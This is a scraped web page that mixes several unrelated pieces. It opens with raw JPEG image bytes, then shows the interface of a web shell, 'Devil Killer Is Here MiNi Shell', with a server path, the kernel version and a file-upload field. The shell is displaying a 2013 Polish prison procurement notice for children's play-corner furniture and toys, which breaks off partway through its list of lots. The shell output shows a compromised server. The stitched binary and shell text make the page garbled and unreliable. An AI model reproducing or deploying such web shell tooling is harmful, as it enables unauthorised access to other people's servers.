JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131129/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131129/491608-N-2013.html

<p class="kh_header"><b>Bydgoszcz: Dostawa sprzętu kwaterunkowego do kącikow zabaw w salach widzeń</b><br>
<b>Numer ogłoszenia: 491608 - 2013; data zamieszczenia: 29.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Bydgoszczy - Fordonie , Rynek 8, 85-790 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3467090, faks 052 3472098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu kwaterunkowego do kącikow zabaw w salach widzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa sprzętu kwaterunkowego do 15 kącików zabaw w salach widzeń w jednostkach organizacyjnych SW okręgu bydgoskiego. Wyposażenie do kącików zabaw zostanie zakupione w ramach wdrażania i realizacji Programu PL17 pn. Wsparcie Służby Więziennej, w tym sankcji pozawięziennych finansowanego ze środków Norweskiego Mechanizmu Finansowego 2009-2014 dotyczącego Projektu nr 112/2013 pn. Realizacja szkoleń podnoszących kompetencje społeczno - zawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary.

2. Zapotrzebowanie ilościowe:
Część nr 1: Sprzęt kwaterunkowy
Stolik dziecięcy: 26 szt., CPV: 39100000-3
Krzesło dziecięce: 104 szt., CPV: 39100000-3
Skrzynia na zabawki: 30 szt., CPV: 39100000-3
Część nr 2: Regał na zabawki
Regał na zabawki: 15 szt., CPV: 39100000-3
Część nr 3: Wykładzina
Wykładzina: 148,64 m2, CPV: 44112200-0
Część nr 4: Artykuły biurowe
Kreda: 150 op.: CPV: 37822300-9
Blok rysunkowy biały A4: 750 szt., CPV: 30192000-1
Kredki świecowe: 150 op., CPV: 37822100-7
Kredki ołówkowe: 150 op., CPV: 37822100-7
Pisaki: 300 op., CPV: 30192125-3
Pisaki do tablic suchościeralnych: 30 op., CPV: 30192125-3
Część nr 5: Książki
Kolorowanki: 750 szt., CPV: 22100000-1
Książki: 300 szt., CPV: 22100000-1
Część nr 6: Zabawki
Wózek dla lalek: 15 szt., CPV: 37522000-3
Mini kuchnia: 15 szt., CPV: 37520000-9
Tablica dwustronna do pisania: 15 szt., CPV: 37500000-3
Mini zjeżdżalnia: 11 szt., CPV: 37500000-3
Samochód wyścigowy: 30 szt., CPV: 37527200-0
Samochód ciężarowy dostawczy: 15 szt., CPV: 37527200-0
Samochód budowlany: 30 szt., CPV: 37527200-0
Lalka typu barbie: 45 szt., CPV: 37510000-6
Lalka typu bobas: 30 szt., CPV: 37510000-6
Klocki plastikowe duże: 15 szt., CPV: 37520000-9
Puzzle 15 elementów: 30 szt., CPV: 37523000-0
Puzzle 24 elementy: 30 szt., CPV: 37523000-0
Puzzle 30 elementów: 15 szt., CPV: 37523000-0
Puzzle 36 elementów: 15 szt., CPV: 37523000-0
Maskotki zwierzątka: 75 szt., CPV: 37520000-9
Domek namiot: 15 szt., CPV: 37500000-3

3. Szczegółowe zapotrzebowanie ilościowe sprzętu kwaterunkowego z podziałem na poszczególne jednostki organizacyjne oraz wymiary wykładzin znajdują się w specyfikacji istotnych warunków zamówienia.





4. Wymagania:
Część nr 1: Sprzęt kwaterunkowy
1. Stolik dziecięcy:
- materiał: tworzywo sztuczne;
- rodzaj tworzywa sztucznego: zawarte w nim substancje chemiczne nie mogą stanowić zagrożenia dla bezpieczeństwa dzieci i/lub osób trzecich;
- wymiary maksymalne: 60 cm x 100cm;
- dopuszczalne odcienie koloru: róż, czerwień, pomarańcz, żółć, zieleń, niebieski, fiolet;
- krawędzie: zaokrąglone;
- deklaracja zgodności WE: produkt musi posiadać aktualną deklarację zgodności WE i być opisany  znakiem CE potwierdzającym, że wyrób wprowadzany do obrotu spełnia określone dla niego wymagania, głowinie odnośnie bezpieczeństwa użytkowania, ochrony zdrowia i ochrony środowiska.
2. Krzesło dziecięce:
- materiał: tworzywo sztuczne;
- rodzaj tworzywa sztucznego: zawarte w nim substancje chemiczne nie mogą stanowić zagrożenia dla bezpieczeństwa dzieci i/lub osób trzecich;
- wzór i wymiary: dostosowane do stolika dziecięcego opisanego powyżej;
- dopuszczalne odcienie koloru: róż, czerwień, pomarańcz, żółć, zieleń, niebieski, fiolet;
- krawędzie: zaokrąglone;
- deklaracja zgodności WE: produkt musi posiadać aktualną deklarację zgodności WE i być opisany  znakiem CE potwierdzającym, że wyrób wprowadzany do obrotu spełnia określone dla niego wymagania, głowinie odnośnie bezpieczeństwa użytkowania, ochrony zdrowia i ochrony środowiska.
3. Skrzynia na zabawki:
- materiał: tworzywo sztuczne;
- rodzaj tworzywa sztucznego: zawarte w nim substancje chemiczne nie mogą stanowić zagrożenia dla bezpieczeństwa dzieci i/lub osób trzecich;
- dopuszczalne odcienie koloru: róż, czerwień, pomarańcz, żółć, zieleń, niebieski, fiolet;
- pojemność minimalna: 50 litrów;
- wyposażona w pokrywkę;
- deklaracja zgodności WE: produkt musi posiadać aktualną deklarację zgodności WE i być opisany  znakiem CE potwierdzającym, że wyrób wprowadzany do obrotu spełnia określone dla niego wymagania, głowinie odnośnie bezpieczeństwa użytkowania, ochrony zdrowia i ochrony środowiska.
Część nr 2: Regał na zabawki
- materiał: płyta laminowana;
- kolor: jasny;
- wymiary: 
wysokość: od 170 do 190 cm,
szerokość: od 90 do 110 cm,
głębokość: od 30 do 40 cm,
- wyposażony w elementy umożliwiające przytwierdzenie do ściany;
- zapakowany do samodzielnego montażu;
- półki przytwierdzone na stałe;
- równa odległość między półkami;
- wykonawca zobowiązany jest dołączyć instrukcję montażu.
Część nr 3: Wykładzina
- wzór: jezdnie, domy i tereny zielone;
- wymiary: różne, w zależności od potrzeb poszczególnych jednostek organizacyjnych (tabela pkt. 3);
- wszystkie boki wykładziny muszą być obszyte, w sposób uniemożliwiający ich rozprucie;
- materiał: wytrzymały na ścieranie, osadzone na grubym filcu, zapewniające izolację od chłodnej podłogi oraz długotrwałą eksploatację;
- wykładzina jest przeznaczona dla dzieci, w związku z tym musi być wykonana w sposób zapewniający bezpieczeństwo podczas użytkowania tj. wykładzina musi posiadać atesty: DS - antypoślizgowy, higieniczny oraz antyelektrostatyczny.
Część nr 4: Artykuły biurowe
1. Kreda
- minimum 10 różnych kolorów w opakowaniu;
- niepyląca;
- deklaracja zgodności WE: produkt musi posiadać aktualną deklarację zgodności WE i być opisany  znakiem CE potwierdzającym, że wyrób wprowadzany do obrotu spełnia określone dla niego wymagania, głowinie odnośnie bezpieczeństwa użytkowania, ochrony zdrowia i ochrony środowiska.
2. Blok rysunkowy biały A4:
- gładkie kartki;
- przeznaczenie: rysunek ołówkiem, kredkami, pisakami, farbkami;
- ilość kartek: min. 20szt.
3. Kredki:
- kredki świecowe: minimum 16 różnych kolorów w opakowaniu;
- kredki ołówkowe: minimum 12 różnych kolorów w opakowaniu;
- wymagania jakościowe:
a) nietoksyczne,
b) odporne na złamanie,
c) niełamliwy grafit (dotyczy kredek ołówkowych),
d) lakierowane (dotyczy kredek ołówkowych),
e) zapakowane w pudełko,
f) łatwe do zatemperowania.
4. Pisaki:
- minimum 12 różnych kolorów w opakowaniu;
- trwałe;
- nietoksyczne;
- szybkoschnący tusz na bazie wody, który nie przesiąka przez papier i nie rozmazuje się na papierze kredowym, ani na foliach prezentacyjnych. 
5.  Pisaki do tablic suchościeralnych:
- tusz po wyschnięciu łatwo ścieralny i nieblaknący;
- minimum 5 różnych kolorów w opakowaniu.


Część nr 5: Książki
1. Kolorowanki:
- przeznaczone dla różnej kategorii wiekowej: dla najmłodszych (0-2 lata), dla przedszkolaków (3-5 lat),  dla dzieci z klas I-III (6-9 lat);
- wzory: różne - dopuszcza się ten sam wzór maksymalnie w 5 egzemplarzach (tj. maksymalnie 5 egzemplarzy na 50 szt. przypadających na 1 kącik zabaw).
2. Książki:
- każda inna (tj. 20 różnych egzemplarzy przypadających na 1 kącik zabaw);
- dla chłopców i dziewczynek w różnym przedziale wiekowym;
- tematyka ma dotyczyć znanych i lubianych postaci z bajek;
- okładka i strony wykonane z twardej tektury;
- wykonane z materiałów bezpiecznych dla dzieci.

Część nr 6: Zabawki
Wszystkie zabawki muszą spełniać zasadnicze wymagania jakościowe dotyczące bezpieczeństwa, w tym ogólne i szczegółowe wymagania określone w rozporządzeniu Ministra Gospodarki z dnia 05 kwietnia 2011 r. w sprawie zasadniczych wymagań dla zabawek (Dz. U. z 2011 r. Nr 83 poz. 454), które implementuje Dyrektywę Parlamentu Europejskiego i Rady 2009/48/WE z 18 czerwca 2009 r. w sprawie bezpieczeństwa zabawek (Dz. Urz. UEL. 2009 Nr 170 poz. 1, z późn. zm.).
1. Wózek dla lalek:
- wykonany z trwałego materiału;
- waga do 5 kg;
- minimalna długość wózka: 50 cm;
- żywa kolorystyka;
- stabilny na dużych kołach;
- imitujący wózek głęboki;
- zdejmowana torba,
- miękki top,
- kosz pod gondolą;
- z przeznaczeniem dla dzieci powyżej 3 lat.
2. Minikuchnia:
- wykonana z trwałego materiału;
- składająca się minimum z piekarnika, płyty kuchennej z palnikami, okapu, regału i zawieszek na przybory kuchenne, zlewu z kranem;
- akcesoria: garnki, patelnia, chochelka, packa, kubki, talerze, sztućce (minimalne wyposażenie);
- minimalna wysokość: 80cm;
- z przeznaczeniem dla dzieci powyżej 3 lat.
3. Tablica dwustronna do pisania:
- dwustronna;
- do pisania kredą i  suchościeralnym pisakiem;
- usadowiona na drewnianym lub aluminiowo - plastikowym stelażu;
- minimalna wysokość: 80cm;
- wyposażona w półkę na przybory.
4. Mini zjeżdżalnia:
- wykonana z bardzo mocnego tworzywa sztucznego;
- szeroka podstawa zapewniająca stabilność;
- antypoślizgowe schodki;
- łagodny zjazd;
- żywa kolorystyka;
- składana;
- maksymalne obciążenie: 25 kg;
- dedykowane parametry:
a) długość ślizgu: 110cm
b) wysokość: 80 cm
c) szerokość: 55 cm
d) długość: 130 cm
dopuszcza się odchylenia rzędu +/-20% wymiaru.
5. Samochody:
- wykonane z trwałego tworzywa sztucznego przeznaczonego do kontaktu z dziećmi;
- każdy inny (tj. 5 różnych egzemplarzy przypadających na 1 kącik zabaw), w tym: wyścigowe różne (2 szt.), ciężarowy dostawczy (1 szt.), budowlane różne (2 szt.);
- kolorowe;
- minimalna długość 25 cm.
6. Lalki:
-  wykonane z trwałego tworzywa sztucznego przeznaczonego do kontaktu z dziećmi, nie pluszowe;
- każda inna (tj. 5 różnych egzemplarzy przypadających na 1 kącik zabaw), w tym: lalka typu barbie (3 szt.), lalka typu bobas (2 szt.);
- minimalna długość lalki: 20 cm;
- ubrane w kolorowe stroje tekstylne.
7. Klocki plastikowe duże:
- wykonane z trwałego tworzywa sztucznego przeznaczonego do kontaktu z dziećmi;
- w zestawie: klocki o różnych wymiarach plus elementy np. do budowy samochodów, okna, drzwi;
- wymiary klocków: 30 x 30 mm; 30 x 60 mm, 30 x 90 mm (dopuszcza się odchylenia rzędu +/-20% wymiaru);
- ilość elementów: minimum 200 szt.;
- kolory: różne;
- opakowanie w wytrzymały worek z tworzywa sztucznego.



8. Puzzle:
- przeznaczone dla różnej kategorii wiekowej dzieci;
- 6 różnych zestawów puzzli przypadających na 1 kącik zabaw;
- ilość elementów: 2 zestawy puzzli - 15 elementów, 2 zestawy puzzli - 24 elementy; 1 zestaw puzzli - 30 elementów; 1 zestaw puzzli - 36 elementów;
- tematyka puzzli: zróżnicowana;
- materiały: trwałe, przeznaczone do kontaktu z dziećmi.
9. Maskotki:
- wzór: zwierzątko;
- wypełnienie: plusz;
- minimalna wysokość: 20cm;
- 5 różnych maskotek przypadająca na 1 kącik zabaw;
- materiały: trwałe przeznaczone do kontaktu z dziećmi.
10. Domek namiot:
- wymiary: wysokość: 100 cm, szerokość: 70 cm (dopuszcza się odchylenia rzędu +/- 20%);
- na podstawie kwadratu lub prostokąta;
- konstrukcja z lekkich plastikowych rurek;
- wiązane na sznureczki wejście;
- materiał tekstylny odporny na działanie promieni UV;
- łatwy montaż;
- na bokach okna.

5. Warunki szczegółowe:
1) Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia do 30 grudnia 2013 r. od daty zawarcia umowy, do siedziby Zakładu Karnego w Bydgoszczy - Fordonie, w dzień roboczy (poniedziałek - piątek), w godz. 7:00 - 14:00.
2) Wykonawca dostarczy sprzęt własnym transportem, na swój koszt.
3) Artykuły muszą być oryginalnie zapakowane i nieuszkodzone.
4) Zamawiający dokona oceny zgodności sprzętu z wymaganiami zawartymi w specyfikacji istotnych warunków zamówienia.
5) Termin płatności: 30 dni, forma płatności: przelew.
6) Wykonawca wystawia faktury VAT na adres poszczególnych jednostek organizacyjnych, w imieniu których Zamawiający przeprowadza postępowanie o zamówienie publiczne, według wskazań określonych w załącznikach nr 1, 2 i 3 do projektu umowy. Każda jednostka organizacyjna jest samodzielnym płatnikiem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 44.11.22.00-0, 37.82.20.00-6, 30.19.20.00-1, 22.10.00.00-1, 37.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w SIWZ rozdział VIII tj.: podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w SIWZ rozdział VIII tj.: podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w SIWZ rozdział VIII tj.: podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w SIWZ rozdział VIII tj.: podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w SIWZ rozdział VIII tj.: podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz cenowy (załącznik nr 1 do specyfikacji);
2. Pełnomocnictwo (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1. Zamawiający przewiduje możliwość  zmiany postanowień niniejszej umowy w następujących sytuacjach:
1) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
2) konieczności wprowadzenia zmian będących następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a innymi niż Wykonawca stronami, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest przedmiotowe zamówienie;
3) konieczności wprowadzenia zmian będących następstwem zmian wytycznych lub zaleceń dotyczących projektów współfinansowanych z Norweskiego Mechanizmu Finansowego 2009-2014;
4) zmian wynikających z okoliczności, których nie można było przewidzieć w dniu zawarcia umowy, a są one korzystne dla  Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Bydgoszczy - Fordonie, ul. Rynek 8, 85 - 790 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2013 godzina 11:00, miejsce: w siedzibie Zamawiającego, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt kwaterunkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stolik dziecięcy: 26 szt.
Krzesło dziecięce: 104 szt.
Skrzynia na zabawki: 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Regał na zabawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Regał na zabawki: 15 szt..</p></li>
